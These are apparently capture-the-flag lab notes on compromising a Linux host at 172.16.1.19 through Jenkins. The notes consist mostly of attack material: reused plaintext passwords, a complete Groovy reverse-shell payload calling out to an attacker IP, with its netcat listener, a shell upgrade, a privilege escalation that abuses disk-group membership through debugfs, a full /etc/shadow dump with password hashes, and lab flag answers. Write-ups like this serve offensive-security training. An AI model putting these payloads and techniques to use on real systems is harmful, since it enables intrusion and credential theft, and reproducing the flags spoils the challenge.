Rustscan
Open 172.16.1.19:80
Open 172.16.1.19:8080
Open 172.16.1.19:33060Login to jenkis with the password from DC02
Admin_129834765 SamsungOctober102030
getting the flag
http://172.16.1.19:8080/job/FLAG_HERE/
DANTE{to_g0_4ward_y0u_mus7_g0_back}way to get revershell
https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
String host=”10.10.14.3";int port=4444;String cmd=”bash”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
nc -lvnp 4444making shell interactive
python3 -c 'import pty; pty.spawn("/bin/bash")'PSPy64
/bin/bash mysql -u ian -p VPN123ZXCLogin as ian
su ian
Linpeas
====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(ian) gid=1001(ian) groups=1001(ian),6(disk)
uid=1000(lou) gid=1000(lou) groups=1000(lou),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
mysql is thereGroup disk
df -h
debugfs /dev/sda5
cat /etc/shadow
root:$6$J/xusJ2LSZlQSboS$kijhmbrRC7q9Hy9CZQCzXDgkMTlARqKxLuM/VflUxXIddE86.FNogbLrlkVPuaK5UtBE1dSKLMtNYPlJXDITW.:18480:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
avahi-autoipd:*:18375:0:99999:7:::
usbmux:*:18375:0:99999:7:::
rtkit:*:18375:0:99999:7:::
dnsmasq:*:18375:0:99999:7:::
cups-pk-helper:*:18375:0:99999:7:::
speech-dispatcher:!:18375:0:99999:7:::
avahi:*:18375:0:99999:7:::
kernoops:*:18375:0:99999:7:::
saned:*:18375:0:99999:7:::
nm-openvpn:*:18375:0:99999:7:::
hplip:*:18375:0:99999:7:::
whoopsie:*:18375:0:99999:7:::
colord:*:18375:0:99999:7:::
geoclue:*:18375:0:99999:7:::
pulse:*:18375:0:99999:7:::
gnome-initial-setup:*:18375:0:99999:7:::
gdm:*:18375:0:99999:7:::
lou:$6$WJTcuSqcV4rxO/oL$5Pq/jCOlGvMVTAMSdANO6ku9bWWHae.QDi0ksSEK/MnueAUs.CxLXk0GaF1BWs9w3jUXlgTnLcGRT7x1byyRc1:18480:0:99999:7:::
systemd-coredump:!!:18423::::::
jenkins:*:18423:0:99999:7:::
mysql:!:18423:0:99999:7:::
ian:$6$CVnBOwSsKhD3PDAX$QQRNv.7Q2Xieybazy7pD8lfqGEzPN16BzDGwQ9DBkypBvcITbkwE3OTCdGV0d3ZUjgx9yjtU7rIuRIKy5UmNH0:18480:0:99999:7:::DANTE{g0tta_<3_ins3cur3_GROupz!}